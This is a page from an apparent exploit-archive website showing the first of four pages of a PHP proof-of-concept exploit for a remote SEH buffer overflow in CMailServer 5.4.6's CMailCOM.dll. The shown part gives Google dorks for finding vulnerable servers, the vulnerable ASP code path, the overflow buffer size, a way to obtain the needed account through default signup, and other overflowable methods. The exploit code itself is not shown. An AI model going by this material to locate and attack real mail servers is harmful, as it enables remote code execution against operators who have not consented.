Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
Joomla Component com_con
AuraCMS
Boonex Dolphin 6.1.2 Mul
CMailServer 5.4.6 (CMail
BoonEx Ray 3.5 (sIncPath
Maian Cart 1.1 Insecure
Dreampics Builder (page)
Safari + Quicktime
Joomla Component com_con
Mole Group Last Minute S
Dreampics Builder (page)
Maian Music 1.0 Insecure
Maian Guestbook
Maian Gallery 2.0 Insecu
WebCMS Portal Edition (i
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
Friendly Technologies Re
Acoustica Beatcraft 1.02
Invision Power Board
Invision Power Board
Postfix
Friendly Technologies Re
Acoustica MP3 CD Burner
Friendly Technologies (f
Friendly Technologies (f
Acoustica Mixcraft
Microsoft Visual Studio
MyBulletinBoard (MyBB)
GeekLog
Belkin wireless G router
Anzio Web Print Object
CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit
  Add date: 07/08/2008   Publishing date: 07/08/2008   Hits: 18
Total 4 pages, Current page:1, Jump to page:
 
<?php
    /*
        CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
proof of concept exploit

        by Nine:Situations:Group::bruiser

        our site: http://retrogod.altervista.org/

        software site: http://www.youngzsoft.net/cmailserver/

        Google dorks:
        intitle:"Mail Server CMailServer WebMail"
        intitle:"Mail Server CMailServer WebMail 5.4.6"

        Some notes:
        This server provides a IIS/webmail interface and a registered component
vulnerable to multiple buffer overflows, among the others, the
CMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
        This class is called by various ASP scripts inside the main folder...
I found this clear vector, look mwmail.asp , lines 25-35:

          ...
  Set objPOP3 = CreateObject("CMailCOM.POP3.1")
          objPOP3.Login Session("User"), Session("Pass")
          Session("LoginSuccess") = objPOP3.LoginSuccess
          If Session("LoginSuccess") = 1 Then
  set rs=Server.createobject("adodb.recordset")
      rs.open "mailfolder",Conn,1,3
    i = 0
    arrString = Split(Request("indexOfMail"), ";", -1, 1)
    While Len(arrString(i)) <> 0
        strUID = arrString(i)
        objPOP3.MoveToFolder strUID ' <---------------- bof
  ...

By attaching olly to the w3wp.exe sub-process you will see the usual
dump with ecx and eip owned, with a buffer of approxymately 13000 chars.

        Exploitation is post-auth but you can have a user account by simply
browsing the signup.asp page, enabled by default.
        Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
that 4-5 failed exploit attempts may result in IIS "Service
Unavailiable" message.

        Other attacks are possible, see a list of locally overflowable
        methods:
        CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx,  GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there's some kind of validation (ex. you can
not have a username with a length of more than 4000 chars which

 
Other pages: : 1 * 2 * 3 * 4 * Next>>
Prev:Safari + Quicktime Next:trixbox (langChoice) Local File Inclusion Exploit (connect-back)

Comment:

Category: Home > Exploit
Home